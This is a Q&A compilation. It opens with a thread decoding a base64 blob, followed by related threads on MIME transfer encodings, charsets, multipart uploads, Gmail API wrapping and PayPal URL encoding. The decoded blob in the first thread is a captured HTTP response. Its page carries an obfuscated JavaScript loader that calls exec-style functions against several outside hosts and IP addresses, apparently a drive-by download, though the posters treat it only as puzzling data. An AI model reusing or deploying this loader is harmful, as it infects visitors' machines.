How is the blob of text encoded? Base64? Something else? - encoding

I am having a string like this H0TCxoL9HSXXwlwXgBJAAAaiAAACBAW0AQMDAAEBBAIA what format is this? Below are some more strings. I thought as base64 but when i decode that i get strings like D????&??_?P#
H0TCxoL9HSbXwl+NUBBAAHISAABIVFRQLzEuMSAyMDAgT0sNCkRhdGU6IE1vbiwgMjEgSnVuIDIwMTAgMDk6NTI6NTMgR01UDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNi4wDQpQM1A6IENQPSJBTEwgQ1VSYSBBRE1hIERFVmEgVEFJYSBPVVIgQlVTIElORCBQSFkgT05MIFVOSSBQVVIgRklOIENPTSBOQVYgSU5UIERFTSBDTlQgU1RBIFBPTCBIRUEgUFJFIExPQyBPVEMiDQpYLVBvd2VyZWQtQnk6H0TCxoL9Hz7Xwl+NUBBAAFJ7AAAibm8tY2FjaGUiPiA8SFRNTD48Ym9keSBvbmxvYWQ9IndpbmRvdy5BWC5FeGVjKCdjdHl6Z0hsaWVUMkJqY254ZVBlM0p6M21ycjgzSlI0UmEwSVg3SXQyRFpaaGl4U2laNnJBaVZuU3JqVmQ4TDZrNXNQKEh6SFJ6TUJIRW5jcChic0Jqem9QcGx5aEJ1KHE2ajV1eG1nTVlWbDJTYTg1Y3B1cCluRXBNbUNxT0hiQUwpNlhvZGt6YUhyKGdCcHdram5IZFBSKVUzOEJTH0TCxoL9IVbXwl+NUBBAAOpdAAB4dC9qYXZhc2NyaXB0Jz52YXIgYjY0PSdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvPSc7U3RyaW5nLnByb3RvdHlwZS5BQT1mdW5jdGlvbigpe3ZhciBvMSxvMixvMyxoMSxoMixoMyxoNCxiaXRzLGQ9W10scGxhaW4sY29kZWQ7Y29kZWQ9dGhpcztmb3IodmFyIGM9MDtjPGNvZGVkLmxlbmd0H0TCxoL9I27Xwl+NUBBAAI+3AABDaGFyQ29kZShvMSk7fXBsYWluPWQuam9pbignJyk7cmV0dXJuIHBsYWluO307d2luZG93LkxhdW5jaFg9ZnVuY3Rpb24oXzEsXzIsXzMsXzQsXzUsXzApe3RoaXMuXzA9XzA7dGhpcy5fMT1fMTt0aGlzLl8yPV8yO3RoaXMuXzM9XzM7dGhpcy5fND1fNDt0aGlzLl81PV81O3RoaXMuXzY9bnVsbDt0aGlzLl83PW51bGw7dGhpcy5fOD1udWxsO3RoaXMuXzk9ZmFsH0TCxoL9JYbXwl+NUBBAAA42AABoaXMuXzIsdGhpcy5fMyx0aGlzLl80KTtkb2N1bWVudC53cml0ZSgnJyk7fTt3aW5kb3cuTGF1bmNoWC5wcm90b3R5cGUuRXhlYz1mdW5jdGlvbihfNyxfOCl7aWYodGhpcy5fOSl7dGhpcy5SdW4oKTtyZXR1cm47fXRoaXMuXzc9Xzc7dGhpcy5fOD1fODt0aGlzLl85PXRydWU7dGhpcy5SdW4oKTt9O3dpbmRvdy5MYXVuY2hYLnByb3RvdHlwZS5JbWFnZUV4ZWM9H0TCxoL9J57Xwl+NUBBAAMwRAAAuTGF1bmNoWC5wcm90b3R5cGUuX0cxPWZ1bmN0aW9uKCl7dGhpcy5fNj1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGlzLl81KTt9O3dpbmRvdy5MYXVuY2hYLnByb3RvdHlwZS5Jbml0PWZ1bmN0aW9uKCl7dGhpcy5fRzEoKTt2YXIgZWw9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnRElWJyk7dmFyIGE9dGhpcy5fMC5BQSgpO2VsLmlubmVySFRNTD1hO307d2luH0TCxoL9KbbXwl+NUBBAAMopAABhRDBuTVNjZ2FHVnBaMmgwUFNjeEp5QnZibXh2WVdROUoycGhkbUZ6WTNKcGNIUTZkMmx1Wkc5M0xrRllMa2x0WVdkbFJYaGxZeWdpYUhSMGNEb3ZMMlJ1Ykc5allXd3VibUZ0Wld0eUxtTnZiVG80T0M5bllXMWxjR2xoZWk5MlpYSnphVzl1TG1GemNDSXBKejQ4YVcxbklITnlZeUE5SUNkb2RIUndPaTh2TlRndU1qSXhMak0wTGpJeE1UbzRPQzluWVcxbGNHbGhlH0TCxoL9K87Xwl+NUBBAAJkHAABNelF1TWpBME9qZzRMMmRoYldWd2FXRjZMM1psY25OcGIyNHVZWE53SWlrblBqeHBiV2NnYzNKaklEMGdKMmgwZEhBNkx5ODNNaTR6TkM0eU5ESXVNakk0T2pnNEwyZGhiV1Z3YVdGNkwyTm9heTVuYVdZbklIZHBaSFJvUFNjeEp5Qm9aV2xuYUhROUp6RW5JRzl1Ykc5aFpEMG5hbUYyWVhOamNtbHdkRHAzYVc1a2IzY3VRVmd1U1cxaFoyVkZlR1ZqS0NKb2RIUndPH0TCxoL9LebXwl+NUBhAABVAAABZWG92WTJockxtZHBaaWNnZDJsa2RHZzlKekVuSUdobGFXZG9kRDBuTVNjZ2IyNXNiMkZrUFNkcVlYWmhjMk55YVhCME9uZHBibVJ2ZHk1QldDNUpiV0ZuWlVWNFpXTW9JbWgwZEhBNkx5OHlNVEV1T0M0eU1UQXVNVGcyT2pnNEwyZGhiV1Z3YVdGNkwzWmxjbk5wYjI0dVlYTndJaWtuUGc9PScpOyB3aW5kb3cuQVguSW5pdCgpOzwvc2NyaXB0PjwvYm9keT48L0hUH0TCxoL9LrbXwl+NUBFAADJm

It may easily be anything, but since it contains mixed-case letters and numbers and few symbols, my guess is for base64.
Addendum
Yes, it is definitely base64; it seems some kind of HTTP request, but it contains some strange characters, I don't know if it's garbage or binary data with some meaning.

Base64
I've run a decoder on it (the whole lot) and this is the result:
D�Ƃ�&��_�P#rHTTP/1.1 200 OK
Date: Mon, 21 Jun 2010 09:52:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
X-Powered-By:D�Ƃ�>��_�P#R{"no-cache"> <HTML><body onload="window.AX.Exec('ctyzgHlieT2BjcnxePe3Jz3mrr83JR4Ra0IX7It2DZZhixSiZ6rAiVnSrjVd8L6k5sP(HzHRzMBHEncp(bsBjzoPplyhBu(q6j5uxmgMYVl2Sa85cpup)nEpMmCqOHbAL)6XodkzaHr(gBpwkjnHdPR)U38BSD�Ƃ�!V��_�P#�]xt/javascript'>var b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';String.prototype.AA=function(){var o1,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;coded=this;for(var c=0;c<coded.lengtD�Ƃ�#n��_�P#��CharCode(o1);}plain=d.join('');return plain;};window.LaunchX=function(_1,_2,_3,_4,_5,_0){this._0=_0;this._1=_1;this._2=_2;this._3=_3;this._4=_4;this._5=_5;this._6=null;this._7=null;this._8=null;this._9=falD�Ƃ�%���_�P#6his._2,this._3,this._4);document.write('');};window.LaunchX.prototype.Exec=function(_7,_8){if(this._9){this.Run();return;}this._7=_7;this._8=_8;this._9=true;this.Run();};window.LaunchX.prototype.ImageExec=D�Ƃ�'���_�P#�.LaunchX.prototype._G1=function(){this._6=document.getElementById(this._5);};window.LaunchX.prototype.Init=function(){this._G1();var el=document.createElement('DIV');var a=this._0.AA();el.innerHTML=a;};winD�Ƃ�)���_�P#�)aD0nMScgaGVpZ2h0PScxJyBvbmxvYWQ9J2phdmFzY3JpcHQ6d2luZG93LkFYLkltYWdlRXhlYygiaHR0cDovL2RubG9jYWwubmFtZWtyLmNvbTo4OC9nYW1lcGlhei92ZXJzaW9uLmFzcCIpJz48aW1nIHNyYyA9ICdodHRwOi8vNTguMjIxLjM0LjIxMTo4OC9nYW1lcGlheD�Ƃ�+���_�P#�MzQuMjA0Ojg4L2dhbWVwaWF6L3ZlcnNpb24uYXNwIiknPjxpbWcgc3JjID0gJ2h0dHA6Ly83Mi4zNC4yNDIuMjI4Ojg4L2dhbWVwaWF6L2Noay5naWYnIHdpZHRoPScxJyBoZWlnaHQ9JzEnIG9ubG9hZD0namF2YXNjcmlwdDp3aW5kb3cuQVguSW1hZ2VFeGVjKCJodHRwOD�Ƃ�-���_�P##YXovY2hrLmdpZicgd2lkdGg9JzEnIGhlaWdodD0nMScgb25sb2FkPSdqYXZhc2NyaXB0OndpbmRvdy5BWC5JbWFnZUV4ZWMoImh0dHA6Ly8yMTEuOC4yMTAuMTg2Ojg4L2dhbWVwaWF6L3ZlcnNpb24uYXNwIiknPg=='); window.AX.Init();</script></body></HTD�Ƃ�.���_�P#2f
This is part of a HTTP response, I'm guessing the gibrige is most likely due to a charset or you've pasted so much of it only. What you're getting is the result of decoding the first few lines only.
Link to decoding tool: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

This is definitely base64, decoding the first line gives you meaningful data, the beginning of HTTP packet dump.
[some header data here]
HTTP/1.1 200 OK
Date: Mon, 21 Jun 2010

Related

Keycloak Mail Templates: force `Content-Transfer-Encoding: quoted-printable` for text MIME part

I'm using Keycloak 15.0.2. When sending an account verification email, the email that gets sent uses Content-Transfer-Encoding: 7bit for the text portion of the email.
This causes the verification link to be on one line, and violates RFC 2822 by having a line that's very long, causing my emails to be bounced.
The HTML portion of the email is properly encoded with Content-Transfer-Encoding: quoted-printable.
I've been trying to look at the source of Keycloak, but my knowledge of java is too poor to really figure it out. I'm sure somewhere the MIME message gets parsed at which point it decides on a header for each part. But I can't find where.
I have seen messages where the text portion did have the correct encoding. So I assume there's a certain condition somewhere that will force the encoding. But I can't find it.
How can I force Keycloak (or Freemarker, or javax MimeBodyPart) to use quoted-printable?
Example of a MIME output:
Content-Type: multipart/alternative; boundary="----=_Part_2_1488711957.1660016366185"
Date: Tue, 9 Aug 2022 03:39:26 +0000 (GMT)
From: Mails#covle.com
MIME-Version: 1.0
Message-ID: <126146379.3.1660016366188#b02efe4baa19>
Received: from b02efe4baa19 by mailhog.example (MailHog)
id duuNy3ONelpvr8ukUqz7WBJnrtPd0oSw43G2W9w8Ix4=#mailhog.example; Tue, 09 Aug 2022 03:39:26 +0000
Reply-To: Mails#example.com
Return-Path: <Mails#examplecom>
Subject: Verify email
To: asdasd#example.com
------=_Part_2_1488711957.1660016366185
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Someone has created a Bluppie account with this email address. If this was you, click the link below to verify your email address
http://localhost:8080/auth/realms/bluppie/login-actions/action-token?key=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICIzODYxY2JmMy0wMWYzLTRhMmQtOTg1NC02MmEyYWMyYzhjNzUifQ.eyJleHAiOjE2NjAwMTY2NjYsImlhdCI6MTY2MDAxNjM2NiwianRpIjoiZDVlYjlhODMtMDE0NS00YTBhLTk2M2YtYjBkMjI0ZTA0ZWVkIiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2JsdXBwaWUiLCJhdWQiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvYXV0aC9yZWFsbXMvYmx1cHBpZSIsInN1YiI6IjIxOGQ1NzkzLTA0NmYtNDQ4NS04ZmIxLTQ0M2E5NjEyM2FmZiIsInR5cCI6InZlcmlmeS1lbWFpbCIsImF6cCI6ImFjY291bnQiLCJub25jZSI6ImQ1ZWI5YTgzLTAxNDUtNGEwYS05NjNmLWIwZDIyNGUwNGVlZCIsImVtbCI6ImFzZGFzZEBjb3ZsZS5jb20iLCJhc2lkIjoiNmM3ZTk5NGItZTA0ZS00ZTlkLWFkNTQtZjE1MGM4NjcwYzdmLlFfQ244SlY0WFlBLmQ1MzI3MTMwLWIzY2EtNDY4Ny1iZDZkLWViZWFiODAwZTdkMyIsImFzaWQiOiI2YzdlOTk0Yi1lMDRlLTRlOWQtYWQ1NC1mMTUwYzg2NzBjN2YuUV9DbjhKVjRYWUEuZDUzMjcxMzAtYjNjYS00Njg3LWJkNmQtZWJlYWI4MDBlN2QzIn0.yrTUf2tl521Q00IUL-2dWTnugUt_ZeATa3W3IrgoRGM&client_id=account&tab_id=Q_Cn8JV4XYA
[NOTE: The line above is the RFC violation.]
This link will expire within 5 minutes.
If you didn't create this account, just ignore this message.
------=_Part_2_1488711957.1660016366185
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
<html>
<body>
<p>Someone has created a Bluppie account with this email address. If this w=
as you, click the link below to verify your email address</p><p><a href=3D"=
http://localhost:8080/auth/realms/bluppie/login-actions/action-token?key=3D=
eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICIzODYxY2JmMy0wMWYzLTRhMmQ=
tOTg1NC02MmEyYWMyYzhjNzUifQ.eyJleHAiOjE2NjAwMTY2NjYsImlhdCI6MTY2MDAxNjM2Niw=
ianRpIjoiZDVlYjlhODMtMDE0NS00YTBhLTk2M2YtYjBkMjI0ZTA0ZWVkIiwiaXNzIjoiaHR0cD=
ovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2JsdXBwaWUiLCJhdWQiOiJodHRwOi8vbG9jY=
Wxob3N0OjgwODAvYXV0aC9yZWFsbXMvYmx1cHBpZSIsInN1YiI6IjIxOGQ1NzkzLTA0NmYtNDQ4=
NS04ZmIxLTQ0M2E5NjEyM2FmZiIsInR5cCI6InZlcmlmeS1lbWFpbCIsImF6cCI6ImFjY291bnQ=
iLCJub25jZSI6ImQ1ZWI5YTgzLTAxNDUtNGEwYS05NjNmLWIwZDIyNGUwNGVlZCIsImVtbCI6Im=
FzZGFzZEBjb3ZsZS5jb20iLCJhc2lkIjoiNmM3ZTk5NGItZTA0ZS00ZTlkLWFkNTQtZjE1MGM4N=
jcwYzdmLlFfQ244SlY0WFlBLmQ1MzI3MTMwLWIzY2EtNDY4Ny1iZDZkLWViZWFiODAwZTdkMyIs=
ImFzaWQiOiI2YzdlOTk0Yi1lMDRlLTRlOWQtYWQ1NC1mMTUwYzg2NzBjN2YuUV9DbjhKVjRYWUE=
uZDUzMjcxMzAtYjNjYS00Njg3LWJkNmQtZWJlYWI4MDBlN2QzIn0.yrTUf2tl521Q00IUL-2dWT=
nugUt_ZeATa3W3IrgoRGM&client_id=3Daccount&tab_id=3DQ_Cn8JV4XYA" rel=3D"nofo=
llow">Link to e-mail address verification</a></p><p>This link will expire w=
ithin 5 minutes.</p><p>If you didn't create this account, just ignore t=
his message.</p>
</body>
</html>
------=_Part_2_1488711957.1660016366185--
tl;dr: Add any non US-ASCII character to your templates and it will be encoded as quoted-printable.
On some cached page I found some old documentation which seem to explain the logic:
getEncoding
public static String getEncoding(DataSource ds)
Get the Content-Transfer-Encoding that should be applied to the input stream of this DataSource, to make it mail-safe.
The algorithm used here is:
If the DataSource implements EncodingAware, ask it what encoding to use. If it returns non-null, return that value.
If the primary type of this datasource is "text" and if all the bytes in its input stream are US-ASCII, then the encoding is "7bit". If more than half of the bytes are non-US-ASCII, then the encoding is "base64". If less than half of the bytes are non-US-ASCII, then the encoding is "quoted-printable".
If the primary type of this datasource is not "text", then if all the bytes of its input stream are US-ASCII, the encoding is "7bit". If there is even one non-US-ASCII character, the encoding is "base64".
Parameters:
ds - the DataSource
Returns:
the encoding. This is either "7bit", "quoted-printable" or "base64"

javax.mail.Part and writeTo, unable to obtain the same "eml" file as the original one

My application parses many messages via javamail 1.5.6, it listens for incoming messages then store some info about them.
Almost all messages contain a digital signature, so my application needs to retrieve the full eml too, that is the raw file representing an email, in this way application users can always prove the validity of these messages.
So, once I have a javax.mail.Message, then I have to produces its eml, so I do:
ByteArrayOutputStream baos = new ByteArrayOutputStream();
m.writeTo(baos);
this.originalMessage = baos.toString(StandardCharsets.UTF_8.name());
this approach generally works, but I had some multipart messages having part like the following:
This is a multi-part message in MIME format.
--------------55D0DAEBFD4BF19F87D16E72 Content-Type: text/plain; charset=iso-8859-15; format=flowed Content-Transfer-Encoding: 8bit
In allegato si notifica ai sensi e per gli effetti dell'art. 11 R.D.
1611/1993, al messaggio PEC, oltre alla Relata di Notifica e
contestuale attestazione di conformità,
--------------55D0DAEBFD4BF19F87D16E72
word "conformità" is not properly transformed in the resulting string, it becomes "conformit�", opening such eml for example with MS Outlook results in an invalid digital signature, so message appears corrupted, different from the original
Have you same idea? Thank you very much
The raw message is not a UTF-8 encoded string, nor is an "eml" file a UTF-8 encoded file. They are both byte streams, and your digital signature should work on byte streams.
In your particular example, the content of the message part is encoded using the iso-8859-15 charset, not UTF-8.

HTTP multipart/form-data. What happends when binary data has no string representation?

I want to write an HTTP implementation.
I've been looking around for a few days about sending files over HTTP with Content-Type: multipart/form-data, and I'm really interested about how browsers (or any HTTP client) creates that kind of request.
I already took a look at a lots of questions about it here at stackoverflow like:
How does HTTP file upload work?
What does enctype='multipart/form-data' mean?
I dig into RFCs 2616 (and newer versions), 2046, etc. But I didn't find a clear answer (obviously I did not get the idea behind it).At most articles and answers I found this piece of request string, that's is simple to me to interpret, all these things are documented at RFCs...
POST /upload?upload_progress_id=12344 HTTP/1.1
Host: localhost:3000
Content-Length: 1325
Origin: http://localhost:3000
... other headers ...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryePkpFF7tjBAqx29L
------WebKitFormBoundaryePkpFF7tjBAqx29L
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryePkpFF7tjBAqx29L
Content-Disposition: form-data; name="uploadedfile"; filename="hello.o"
Content-Type: application/x-object
... contents of file goes here ...
------WebKitFormBoundaryePkpFF7tjBAqx29L--
...and it would be simple to implement an HTTP client to construct a piece of string that way in any language.The problem becomes at ... contents of file goes here ..., there's little information about what "contents of file" is. I know it's binary data with a certain type and encoding, but It's difficult to think out of string data, how I would add a piece of binary data that has no string representation inside a string.
I would like to see examples of low level implementations of HTTP protocol with any language. And maybe in depth explanations about binary data transfer over HTTP, how client creates requests and how server read/parse it. PD. I know this question my look a duplicate but most of the answers are not focused on explaining binary data transfer (like media).
You should not try to handle strings on this part of the body, you should send binary data, see it as reading bytes from the resource and sending theses bytes unaltered.
So especially no encoding applied, no utf-8, no base64, HTTP is not a protocol with an ascii7 restriction like smtp, where base64 encoding is applied to ensure only ascii7 characters are used.
There is, by definition, no string version of this data, and looking at raw HTTP transfer (with wireshark for example) you should see binary data, bytes, stuff.
This is why most HTTP servers uses C to manage HTTP, they parse the HTTP communication byte per byte (as the protocol headers are ascii 7 only, certainly not multibytes characters) and they can also read/write arbitrary
binary data for the body quite easily (or even using system calls like readfile to let the kernel manage the binary part).
Now, about examples.
When you use Content-Length and no multipart stuff the body is exactly (content-length) bytes long, so the client parsing your sent data will just read this number of bytes and will treat this whole raw data as the body content (which may have a mime type and and encoding information, but that's just informations for layers set on top of the HTTP protocol).
When you use Transfer-Encoding: chunked, the raw binary body is separated into pieces, each part is then prefixed by an hexadecimal number (the size of the chunk) and the end of line marker. With a final null marker at the end.
If we take the wikipedia example:
4\r\n
Wiki\r\n
5\r\n
pedia\r\n
E\r\n
in\r\n
\r\n
chunks.\r\n
0\r\n
\r\n
We could replace each ascii7 letter by any byte, even a byte that would have no ascii7 representation, Ill use a * character for each real body byte:
4\r\n
****\r\n
5\r\n
*****\r\n
E\r\n
**************\r\n
0\r\n
\r\n
All the other characters are part of the HTTP protocol (here a chunked body transmission). I could also use a \n representation of binary data, and send only the null byte for each byte of the body, that would be:
4\r\n
\0\0\0\0\0\r\n
5\r\n
\0\0\0\0\0\0\r\n
E\r\n
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\r\n
0\r\n
\r\n
That's just a representation, we could also use \xNN or \NN representations, in reality these are bytes, 8 bits (too lazy to write the 0/1 representation of this body :-) ).
If the text of the example, instead of being:
Wikipedia in\r\n
\r\n
chunks.
It could have been a more complex one, with multibytes characters (here a é in utf-8):
Wikipédia in\r\n
\r\n
chunks.
This é is in fact 11000011:10101001 in utf-8, two bytes: \xc3\xa9 in \xNN representation), instead of the simple 01100101 / \x65 / echaracter. The HTTP body is now (see that second chunk size is 6 and not 5):
4\r\n
Wiki\r\n
6\r\n
p\xc3\xa9dia\r\n
E\r\n
in\r\n
\r\n
chunks.\r\n
0\r\n
\r\n
But this is only valid if the source data was effectively in utf-8, could have been another encoding. By default, unless you have some specific configuration settings available in your web server where you enforce a conversion of the source document in a specific encoding, that's not really the job of the web server to convert the source document, you take what you have, and you maybe add an header to tell the client what encoding was defined on the source document.
Finally we have the multipart way of transmitting the body, like in your question, it's a lot like the chunked version, except here boundaries and intermediary headers are used, but for the binary data between these boundaries, headers, and line endings control characters it is the same rule, everything inside are just bytes...

Gmail API - plaintext word wrapping

When sending emails using the Gmail API, it places hard line breaks in the body at around 78 characters per line. A similar question about this can be found here.
How can I make this stop? I simply want to send plaintext emails through the API without line breaks. The current formatting looks terrible, especially on mobile clients (tested on Gmail and iOS Mail apps).
I've tried the following headers:
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Am I missing anything?
EDIT: As per Mr.Rebot's suggestion, I've also tried this with no luck:
Content-Type: mixed/alternative
EDIT 2: Here's the exact format of the message I'm sending (attempted with and without the quoted-printable header:
From: Example Account <example1#example.com>
To: <example2#example.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Subject: This is a test!
Date: Tue, 18 Oct 2016 10:46:57 -GMT-07:00
Here is a long test message that will probably cause some words to wrap in strange places.
I take this full message and Base64-encode it, then POST it to /gmail/v1/users/{my_account}/drafts/send?fields=id with the following JSON body:
{
"id": MSG_ID,
"message": {
"raw": BASE64_DATA
}
}
Are you running the content through a quoted printable encoder and sending the encoded content value along with the header or expecting the API to encode it for you?
Per wikipedia it seems like if you add soft line breaks with = less than 76 characters apart as the last character on arbitrary lines, they should get decoded out of the result restoring your original text.
UPDATE
Try sending with this content whose message has been quoted-printable encoded (base64 it):
From: Example Account <example1#example.com>
To: <example2#example.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Subject: This is a test!
Date: Tue, 18 Oct 2016 10:46:57 -GMT-07:00
Here is a long test message that will probably cause some words to wrap in =
strange places.
I'm assuming you have a function similar to this:
1. def create_message(sender, to, cc, subject, message_body):
2. message = MIMEText(message_body, 'html')
3. message['to'] = to
4. message['from'] = sender
5. message['subject'] = subject
6. message['cc'] = cc
7. return {'raw': base64.urlsafe_b64encode(message.as_string())}
The one trick that finally worked for me, after all the attempts to modify the header values and payload dict (which is a member of the message object), was to set (line 2):
message = MIMEText(message_body, 'html') <-- add the 'html' as the second parameter of the MIMEText object constructor
The default code supplied by Google for their gmail API only tells you how to send plain text emails, but they hide how they're doing that.
ala...
message = MIMEText(message_body)
I had to look up the python class email.mime.text.MIMEText object.
That's where you'll see this definition of the constructor for the MIMEText object:
class email.mime.text.MIMEText(_text[, _subtype[, _charset]])
We want to explicitly pass it a value to the _subtype. In this case, we want to pass: 'html' as the _subtype.
Now, you won't have anymore unexpected word wrapping applied to your messages by Google, or the Python mime.text.MIMEText object
This exact issue made me crazy for a good couple of hours, and no solution I could find made any difference.
So if anyone else ends up frustrated here, I'd thought I'd just post my "solution".
Turn your text (what's going to be the body of the email) into simple HTML. I wrapped every paragraph in a simple <p>, and added line-breaks (<br>) where needed (e.g. my signature).
Then, per Andrew's answer, I attached the message body as MIMEText(message_text, _subtype="html"). The plain-text is still not correct AFAIK, but it works and I don't think there's a single actively used email-client out there that doesn't render HTML anymore.

Paypal decode encode issue with + in timestamp

I was quite frustrated with IPN testing. Although in the end I was able to pin point the issue in Validate step timestamp field, I need help with how to handle the + sign in time stamp.
I noticed when I decode and encode, the space from Paypal request became + sign. So I did a replacement of + with %20. This was tested okay. However it would be an issue if there is timezone info inside the payment date.
E.g. Fri Jul 08 2016 10:22:01 GMT+0800 (Malay Peninsula Standard Time)
parameter came in as:
Fri%20Jul%2008%202016%2010%3A22%3A01%20GMT+0800%20%28Malay%20Peninsula%20Standard%20Time%29
after decoding:
Fri Jul 08 2016 10:22:01 GMT 0800 (Malay Peninsula Standard Time) <=====the plus sign is missing.....
encode again:
Fri+Jul+08+2016+10%3A22%3A01+GMT+0800+%28Malay+Peninsula+Standard+Time%29
What I did was: replay the + sign before decoding with some temp placeholder. then once decode / encode, revert back the replacement.
Some how this could not be verified by Paypal.
Okay, I got it working....not sure whether it's the best way, but works now.
basically I patch the incoming parameter value by replacing + with a placeholder.
patchedValue = value.replace("+", "TEMPXXX");
....
In the end, after encoding, replace the placeholder with %2B, which is + sign.
....
URLEncoder.encode(decodedValue, encoding).replace("+", "%20").replace("TEMPXXX", "%2B")